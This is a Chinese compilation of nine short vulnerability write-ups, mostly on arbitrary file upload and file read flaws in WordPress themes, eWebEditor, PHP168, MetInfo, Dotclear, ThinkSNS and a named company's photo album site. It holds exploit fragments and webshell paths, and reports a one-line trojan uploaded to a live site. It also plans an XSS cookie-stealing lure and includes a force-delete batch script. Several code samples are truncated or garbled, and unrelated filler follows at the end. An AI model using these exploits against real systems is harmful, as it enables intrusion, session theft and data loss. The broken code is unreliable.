以下是小编整理的WordPress Area53主题任意文件上传,本文共9篇,仅供参考,希望能够帮助到大家。
篇1:WordPress Area53主题任意文件上传
############################################################### 标题: WordPress Area53 theme Arbitrary File Upload Vulnerability# 作者: Byakuya# 开发者: themeforest.net/# 主题连接k: themeforest.net/item/area53-a-responsive-html5-wordpress-theme/2538737# 影响版本: v1.0.1 - v1.0.5# 类型: webapps/php############################################################# # 测试利用 ”@$uploadfile”));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);print “$postResult”;?> #Shell path: site.com/wordpress/wp-content/uploads//10/up.php
篇2:ActiveX远程任意文件利用
Ultra Office ActiveX Control Remote Arbitrary File Corruption
url: www.ultrashareware.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
篇3:ewebeditor for php任意文件上传漏洞
此漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞,PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下:
$sUsername = “admin”;
$sPassword = “admin”;
$aStyle[1] = “gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1”;
........
它将所有的风格配置信息保存为一个数组$aStyle,在register_global为on的情况下我们可以任意添加自己喜欢的风格,然后就可以在自己添加的风格中可以随意定义可上传文件类型。
这漏洞成因很简单,下面给个exp
URL:
file:
漏洞修补方法:
初始化数组$aStyle
$sUsername = “admin”;
$sPassword = “admin”;
$aStyle. = array();
$aStyle[1] = “gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格,部分常用按钮,标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1”;
篇4:Php168 读取任意文件漏洞
地址:hi.baidu.com/saiy_hi/
哦,忘记说了,程序官方URL:www.php168.com/#
代码:..job.php Line:117
if( eregi(“.php”,$url) ){
die(“ERR”);
}
$fileurl=str_replace($webdb[www_url],“”,$url);
if(is_file(PHP168_PATH.“$fileurl”)&&filesize(PHP168_PATH.“$fileurl”)<1024*1024*500){
$filename=basename($fileurl);
$filetype=substr(strrchr($filename,'.'),1);
$_filename=preg_replace(“/([d]+)_(200[d]+)_([^_]+).([^.]+)/is”,“3”,$filename);
if(eregi(“^([a-z0-9=]+)$”,$_filename)&&!eregi(“(jpg|gif|png)$”,$filename)){
$filename=urldecode(base64_decode($_filename)).“.$filetype”;
}
ob_end_clean;
header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT');
header('Pragma: no-cache');
header('Content-Encoding: none');
header('Content-Disposition: attachment; filename='.$filename);
header('Content-type: '.$filetype);
header('Content-Length: '.filesize(PHP168_PATH.“$fileurl”));
readfile(PHP168_PATH.“$fileurl”);
}else{
$fileurl=strstr($url,“://”)?$url:tempdir($fileurl);
header(“location:$fileurl”);
}
在这段代码里,有判断url里是否包含.php,但是在接下来,这里有个替换
$fileurl=str_replace($webdb[www_url],“”,$url);
.p$webdb[www_url]hp被替换后就是.php,但是可以顺利通过前面的是否存在.php的判断,
我没有安装这个代码,但是搜索了一下代码,$webdb[www_url]应该是Web的URL地址。
结论是:可以读取任意文件。
我写了一个Exp来读取文件,但是由于没有安装php168,所以如果有人愿意测试就安了~
由于以前写的EXP太不人性化了,现在连输入变量的方式都改变了~~~
php php168.php运行就好了
PHP代码
make_input('file_path','先生,你想读个啥文件呢?'); $query = str_replace('php','ph'.$url.'p',$file_path); $hack_url = $url.'job.php?url='.base64_encode($query); $result = file_get_contents($hack_url); echo $result; die; function make_input($name,$msg=“请输入{name}的值”,0='text'){ global $$name; while(1){ $msg = str_replace('{name}',$name,$msg); $_input = trim(fgets(STDIN)); if(0=='int'){ $$name = $_input; } $$name = $_input; } }else{ } }
篇5:MetInfov5.1.3 任意文件上传漏洞漏洞预警
MetInfo 23号发布了新版本5.1.5,修补了本文提到的漏洞,当然严格来说应该是任意变量覆盖漏洞....
ps:欢迎各种形式转载,首发t00ls.net
注:请勿利用本文内容从事一切非法活动,否则后果自负
author:my5t3ry
废话不多说,看代码:
includecommon.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql();$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}
metinfo系统通过查询数据库的{$tablepre}config表,并将获取的结果通过foreach循环初始化表名变量,其中的
是通过代码
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);
来初始化的,然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库,
其中的$met_message变量就是前面foreach循环初始化的变量……
我们可以覆盖$tablepre变量使表名初始化失败,进而提交表名变量.....
我找了个后台的上传页面,通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表,构造上传漏洞,
MetInfov5.1.3 任意文件上传漏洞漏洞预警
,
exp:任意文件上传
任意文件上传
篇6:强制删除任意文件以及文件夹
DEL /F /A /Q ?%1
RD /S /Q ?%1
保存为*.bat
将要删除的文件以及文件夹拖到该批处理上,
强制删除任意文件以及文件夹
,
篇7:好孩子某处xss+任意文件上传
某处么有做任务过滤,存在存储型xss,某处上传也么有做任何过滤,导致可以上传任意文件
1. 注册一个账户后,点击相册模块,上传图片处
右击查看源码
上传按钮处查看
调用checkUploadInput
查看调用js处js代码
album.goodbaby.com/album/js/album.js
function checkUploadInput {
var uploadfiles = document.getElementsByName('uploadfiles[]');
var empty = true;
for(i=0;i var uploadfile = uploadfiles[i]; if(uploadfile.value != '') { empty = false; break; } } if(document.getElementById('categoryid').value == '') { alert('请选择分类!'); document.getElementById('categoryid').focus(); } else if(document.getElementById('albumid').value == '') { alert('请选择相册!'); document.getElementById('albumid').focus(); } else if(empty) { alert('请选择上传的照牿!'); } else { if(document.getElementById('tags').value != ''){ var patrn=/^[-.a-zA-Z0-9s_u4e00-u9fa5]+$/; if(!patrn.exec(document.getElementById('tags').value)) { alert('标签不能包含特殊字符,比如‿/、[、]〿%〿*”之类的特殊符号!'); document.getElementById('tags').focus(); return; } } popup(4,0); document.uploadform.submit(); } } 前台无任何过滤,上传文件后查看文件得到文件的地方,下载文件与原文件对比,发现文件么做任何处理, 好孩子某处xss+任意文件上传 , 前台,后台没有过滤导致可上传任意文件。 我上传了一个一句话木马,地址没找到,不过记得之前有位已经暴力能猜解出上传后生成的文件名,然后推测出地址,忘了也就不折腾了。 上传带php脚本的jpg photo.goodbaby.com/120920/14/U1112845528/55e04373cab5931a.jpg 2. 然后上传文件抓包,发现post提交的时候包括文件流,照片分类,照片的tag都可以修改,此处只有tag做了正则判断,如果post提交过程中修改依然可导致存储型xss(没测试) 3. 照片描述处存储型xss,该xss目测可能危害比较严重 照片描述处无任务过滤 album.goodbaby.com/album/album_photo.php?photoid=69a5aa#viewpic 而用户上传的图片,又会更新在首页 album.goodbaby.com/album/album.php 如若我们上传一个性感图片,构造js收集cookie,坐等鱼上勾~~,嘿嘿! 上传: photo.goodbaby.com/120920/14/U1112845528/55e04373cab5931a.jpg xss: album.goodbaby.com/album/album_photo.php?photoid=69a5aa#viewpic 修复方案: 过滤...
篇8:Dotclear 2.4.2任意文件上传缺陷及修复
标题: dotclear-2.4.2 (Swf) File Upload Vulnerability
作者: T0x!c Malik_99@hotmail.fr
程序下载地址: fr.dotclear.org/download
影响版本: 2.4.2
测试系统: [Windows Xp]
测试证明:
/path/inc/swf/swfupload.swf
你可以用php格式上传文件
例如: c99.php, shell.gif.php, 等等
www.2cto.co提供修复
加强验证
篇9:ThinkSNS又一个任意上传文件漏洞漏洞预警
某模块未对上传文件类型进行验证,可上传任意文件
代码产生位置
appswapLibActionIndexAction.class.php
263行
if(!empty($_FILES['pic']['name'])) { // 自动发一条图片微博
$data['pic'] = $_FILES['pic'];
$data['content'] = '图片分享';
$data['from'] = $this->_type_wap;
$res = api('Statuses')->data($data)->upload();
}
未对文件类型过滤
访问wap 模块
发一条微博并传图
firebug 地址
去掉small_然后访问
www.myhack58.com/data/uploads/2012/1023/17/50865d481c217.php
修复方案:
对上传类型要进行检查
★党委文件
★文件范本
★规范文件
★文件通知
★工作文件
★文件范文
文档为doc格式
